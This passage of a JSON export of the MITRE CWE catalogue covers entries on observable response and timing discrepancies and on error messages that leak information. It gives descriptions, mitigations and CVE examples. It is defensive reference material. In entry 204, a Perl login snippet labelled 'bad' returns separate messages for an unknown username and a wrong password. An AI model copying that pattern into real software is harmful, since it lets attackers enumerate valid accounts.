guessing.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0637"},{"Reference":"CVE-2003-0190","Description":"Product immediately sends an error message when a user does not exist, which allows remote attackers to determine valid usernames via a timing attack.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0190"},{"Reference":"CVE-2004-1602","Description":"FTP server responds in a different amount of time when a given username exists, which allows remote attackers to identify valid usernames by timing the server response.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1602"},{"Reference":"CVE-2005-0918","Description":"Browser allows remote attackers to determine the existence of arbitrary files by setting the src property to the target filename and using Javascript to determine if the web page immediately stops loading, which indicates whether the file exists or not.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0918"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Discrepancy Information Leaks"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A6","Entry_Name":"Information Leakage and Improper Error Handling","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A7","Entry_Name":"Improper Error Handling","Mapping_Fit":"CWE More Specific"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"189"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Alternate_Terms, Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Name, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Alternate_Terms, Common_Consequences, Demonstrative_Examples, Description, Name, Potential_Mitigations, Related_Attack_Patterns, Relationships, Research_Gaps"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Description, Name, Potential_Mitigations, Research_Gaps"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Demonstrative_Examples"}],"Contribution":{"attr":{"@_Type":"Content"},"Contribution_Name":"Nicole Fern","Contribution_Organization":"Tortuga Logic","Contribution_Date":"2020-06-03","Contribution_Comment":"Provided Demonstrative Example for cache timing attack"},"Previous_Entry_Name":[{"#text":"Discrepancy Information Leaks","attr":{"@_Date":"2009-12-28"}},{"#text":"Information Exposure Through Discrepancy","attr":{"@_Date":"2020-02-24"}},{"#text":"Observable Discrepancy","attr":{"@_Date":"2020-08-20"}},{"#text":"Observable Differences in Behavior to Error Inputs","attr":{"@_Date":"2020-12-10"}}]}},"204":{"attr":{"@_ID":"204","@_Name":"Observable Response Discrepancy","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product provides different responses to incoming requests in a way that reveals internal state information to an unauthorized actor outside of the intended control sphere.","Extended_Description":"This issue frequently occurs during authentication, where a difference in failed-login messages could allow an attacker to determine if the username is valid or not. These exposures can be inadvertent (bug) or intentional (design).","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"203","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Access Control"],"Impact":["Read Application Data","Bypass Protection Mechanism"]}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-46"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":{"xhtml:p":["Compartmentalize the system to have \\"safe\\" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area.","Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges."]}},{"attr":{"@_Mitigation_ID":"MIT-39"},"Phase":"Implementation","Description":{"xhtml:p":["Ensure that error messages only contain minimal details that are useful to the intended audience and no one else. The messages need to strike the balance between being too cryptic (which can confuse users) or being too detailed (which may reveal more than intended). The messages should not reveal the methods that were used to determine the error. Attackers can use detailed information to refine or optimize their original attack, thereby increasing their chances of success.","If errors must be captured in some detail, record them in log messages, but consider what could occur if the log messages can be viewed by attackers. Highly sensitive information such as passwords should never be saved to log files.","Avoid inconsistent messaging that might accidentally tip off an attacker about internal state, such as whether a user account exists or not."]}}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-38"},"Intro_Text":"The following code checks validity of the supplied username and password and notifies the user of a successful or failed login.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"my $username=param(\'username\');my $password=param(\'password\');if (IsValidUsername($username) == 1){}else{}","xhtml:br":["","","","","",""],"xhtml:div":[{"#text":"if (IsValidPassword($username, $password) == 1){}else{}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""],"xhtml:div":[{"#text":"print \\"Login Successful\\";","attr":{"@_style":"margin-left:10px;"}},{"#text":"print \\"Login Failed - incorrect password\\";","attr":{"@_style":"margin-left:10px;"}}]},{"#text":"print \\"Login Failed - unknown username\\";","attr":{"@_style":"margin-left:10px;"}}]}},{"attr":{"@_Nature":"result"},"xhtml:div":"\\"Login Failed - incorrect username or password\\""}],"Body_Text":["In the above code, there are different messages for when an incorrect username is supplied, versus when the username is correct but the password is wrong. This difference enables a potential attacker to understand the state of the login function, and could allow an attacker to discover a valid username by trying different values until the incorrect password message is returned. In essence, this makes it easier for an attacker to obtain half of the necessary authentication credentials.","While this type of information may be helpful to a user, it is also useful to a potential attacker. In the above example, the message for both failed cases should be the same, such as:"]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-2094","Description":"This, and others, use \\"..\\" attacks and monitor error responses, so there is overlap with directory traversal.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2094"},{"Reference":"CVE-2001-1483","Description":"Enumeration of valid usernames based on inconsistent responses","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1483"},{"Reference":"CVE-2001-1528","Description":"Account number enumeration via inconsistent responses.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1528"},{"Reference":"CVE-2004-2150","Description":"User enumeration via discrepancies in error messages.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2150"},{"Reference":"CVE-2005-1650","Description":"User enumeration via discrepancies in error messages.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1650"},{"Reference":"CVE-2004-0294","Description":"Bulletin Board displays different error messages when a user exists or not, which makes it easier for remote attackers to identify valid users and conduct a brute force password guessing attack.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0294"},{"Reference":"CVE-2004-0243","Description":"Operating System, when direct remote login is disabled, displays a different message if the password is correct, which allows remote attackers to guess the password via brute force methods.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0243"},{"Reference":"CVE-2002-0514","Description":"Product allows remote attackers to determine if a port is being filtered because the response packet TTL is different than the default TTL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0514"},{"Reference":"CVE-2002-0515","Description":"Product sets a different TTL when a port is being filtered than when it is not being filtered, which allows remote attackers to identify filtered ports by comparing TTLs.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0515"},{"Reference":"CVE-2001-1387","Description":"Product may generate different responses than specified by the administrator, possibly leading to an information leak.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1387"},{"Reference":"CVE-2004-0778","Description":"Version control system allows remote attackers to determine the existence of arbitrary files and directories via the -X command for an alternate history file, which causes different error messages to be returned.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0778"},{"Reference":"CVE-2004-1428","Description":"FTP server generates an error message if the user name does not exist instead of prompting for a password, which allows remote attackers to determine valid usernames.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1428"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Response discrepancy infoleak"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 12: Information Leakage.&#34; Page 191"}}},"Notes":{"Note":{"#text":"can overlap errors related to escalated privileges","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Description, Name, Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Response Discrepancy Information Leak","attr":{"@_Date":"2010-09-27"}},{"#text":"Response Discrepancy Information Exposure","attr":{"@_Date":"2020-02-24"}}]}},"205":{"attr":{"@_ID":"205","@_Name":"Observable Behavioral Discrepancy","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product\'s behaviors indicate important differences that may be observed by unauthorized actors in a way that reveals (1) its internal state or decision process, or (2) differences from other products with equivalent functionality.","Extended_Description":"Ideally, a product should provide as little information about its internal operations as possible.  Otherwise, attackers could use knowledge of these internal operations to simplify or optimize their attack.  In some cases, behavioral discrepancies can be used by attackers to form a side channel.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"203","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"514","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Access Control"],"Impact":["Read Application Data","Bypass Protection Mechanism"]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0208","Description":"Product modifies TCP/IP stack and ICMP error messages in unusual ways that show the product is in use.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0208"},{"Reference":"CVE-2004-2252","Description":"Behavioral infoleak by responding to SYN-FIN packets.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2252"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Behavioral Discrepancy Infoleak"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":45,"Entry_Name":"Fingerprinting"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Name, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Behavioral Discrepancy Information Leak","attr":{"@_Date":"2009-12-28"}},{"#text":"Information Exposure Through Behavioral Discrepancy","attr":{"@_Date":"2020-02-24"}}]}},"206":{"attr":{"@_ID":"206","@_Name":"Observable Internal Behavioral Discrepancy","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product performs multiple behaviors that are combined to produce a single result, but the individual behaviors are observable separately in a way that allows attackers to reveal internal state or internal decision points.","Extended_Description":"Ideally, a product should provide as little information as possible to an attacker.  Any hints that the attacker may be making progress can then be used to simplify or optimize the attack.  For example, in a login procedure that requires a username and password, ultimately there is only one decision: success or failure.  However, internally, two separate actions are performed: determining if the username exists, and checking if the password is correct.  If the product behaves differently based on whether the username exists or not, then the attacker only needs to concentrate on the password.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"205","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Access Control"],"Impact":["Read Application Data","Bypass Protection Mechanism"]}},"Potential_Mitigations":{"Mitigation":{"Description":"Setup generic response pages for error conditions. The error page should not disclose information about the success or failure of a sensitive operation. For instance, the login page should not confirm that the login is correct and the password incorrect. The attacker who tries random account name may be able to guess some of them. Confirming that the account exists would make the login page more susceptible to brute force attack."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-2031","Description":"File existence via infoleak monitoring whether \\"onerror\\" handler fires or not.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2031"},{"Reference":"CVE-2005-2025","Description":"Valid groupname enumeration via behavioral infoleak (sends response if valid, doesn\'t respond if not).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2025"},{"Reference":"CVE-2001-1497","Description":"Behavioral infoleak in GUI allows attackers to distinguish between alphanumeric and non-alphanumeric characters in a password, thus reducing the search space.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1497"},{"Reference":"CVE-2003-0190","Description":"Product immediately sends an error message when user does not exist instead of waiting until the password is provided, allowing username enumeration.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0190"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Internal behavioral inconsistency infoleak"}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Name, Potential_Mitigations, Relationships"}],"Previous_Entry_Name":[{"#text":"Internal Behavioral Inconsistency Information Leak","attr":{"@_Date":"2011-03-29"}},{"#text":"Information Exposure of Internal State Through Behavioral Inconsistency","attr":{"@_Date":"2020-02-24"}}]}},"207":{"attr":{"@_ID":"207","@_Name":"Observable Behavioral Discrepancy With Equivalent Products","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product operates in an environment in which its existence or specific identity should not be known, but it behaves differently than other products with equivalent functionality, in a way that is observable to an attacker.","Extended_Description":"For many kinds of products, multiple products may be available that perform the same functionality, such as a web server, network interface, or intrusion detection system.  Attackers often perform \\"fingerprinting,\\" which uses discrepancies in order to identify which specific product is in use.  Once the specific product has been identified, the attacks can be made more customized and efficient.  Often, an organization might intentionally allow the specific product to be identifiable.  However, in some environments, the ability to identify a distinct product is unacceptable, and it is expected that every product would behave in exactly the same way.  In these more restricted environments, a behavioral difference might pose an unacceptable risk if it makes it easier to identify the product\'s vendor, model, configuration, version, etc.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"205","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Access Control"],"Impact":["Read Application Data","Bypass Protection Mechanism"]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0208","Description":"Product modifies TCP/IP stack and ICMP error messages in unusual ways that show the product is in use.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0208"},{"Reference":"CVE-2004-2252","Description":"Behavioral infoleak by responding to SYN-FIN packets.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2252"},{"Reference":"CVE-2000-1142","Description":"Honeypot generates an error with a \\"pwd\\" command in a particular directory, allowing attacker to know they are in a honeypot system.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1142"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"External behavioral inconsistency infoleak"}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Name, Relationships"}],"Previous_Entry_Name":[{"#text":"External Behavioral Inconsistency Information Leak","attr":{"@_Date":"2009-12-28"}},{"#text":"Information Exposure Through an External Behavioral Inconsistency","attr":{"@_Date":"2020-02-24"}}]}},"208":{"attr":{"@_ID":"208","@_Name":"Observable Timing Discrepancy","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Two separate operations in a product require different amounts of time to complete, in a way that is observable to an actor and reveals security-relevant information about the state of the product, such as whether a particular operation was successful or not.","Extended_Description":"In security-relevant contexts, even small variations in timing can be exploited by attackers to indirectly infer certain details about the product\'s internal operations.  For example, in some cryptographic algorithms, attackers can use timing differences to infer certain properties about a private key, making the key easier to guess.  Timing discrepancies effectively form a timing side channel.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"203","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"385","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"327","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Access Control"],"Impact":["Read Application Data","Bypass Protection Mechanism"]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2003-0078","Description":"SSL implementation does not perform a MAC computation if an incorrect block cipher padding is used, which causes an information leak (timing discrepancy) that may make it easier to launch cryptographic attacks that rely on distinguishing between padding and MAC verification errors, possibly leading to extraction of the original plaintext, aka the \\"Vaudenay timing attack.\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0078"},{"Reference":"CVE-2000-1117","Description":"Virtual machine allows malicious web site operators to determine the existence of files on the client by measuring delays in the execution of the getSystemResource method.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1117"},{"Reference":"CVE-2003-0637","Description":"Product uses a shorter timeout for a non-existent user than a valid user, which makes it easier for remote attackers to guess usernames and conduct brute force password guessing.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0637"},{"Reference":"CVE-2003-0190","Description":"Product immediately sends an error message when a user does not exist, which allows remote attackers to determine valid usernames via a timing attack.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0190"},{"Reference":"CVE-2004-1602","Description":"FTP server responds in a different amount of time when a given username exists, which allows remote attackers to identify valid usernames by timing the server response.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1602"},{"Reference":"CVE-2005-0918","Description":"Browser allows remote attackers to determine the existence of arbitrary files by setting the src property to the target filename and using Javascript to determine if the web page immediately stops loading, which indicates whether the file exists or not.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0918"}]},"Functional_Areas":{"Functional_Area":["Cryptography","Authentication"]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Timing discrepancy infoleak"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"462"}}},"Notes":{"Note":{"#text":"Often primary in cryptographic applications and algorithms.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Other_Notes, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Timing Discrepancy Information Leak","attr":{"@_Date":"2011-03-29"}},{"#text":"Information Exposure Through Timing Discrepancy","attr":{"@_Date":"2020-02-24"}}]}},"209":{"attr":{"@_ID":"209","@_Name":"Generation of Error Message Containing Sensitive Information","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software generates an error message that includes sensitive information about its environment, users, or associated data.","Extended_Description":{"xhtml:p":["The sensitive information may be valuable information on its own (such as a password), or it may be useful for launching other, more serious attacks. The error message may be created in different ways:","An attacker may use the contents of error messages to help launch another, more focused attack. For example, an attempt to exploit a path traversal weakness (CWE-22) might yield the full pathname of the installed application. In turn, this could be used to select the proper number of \\"..\\" sequences to navigate to the targeted file. An attack using SQL injection (CWE-89) might not initially succeed, but an error message could reveal the malformed query, which would expose query logic and possibly even passwords or other sensitive information used within the 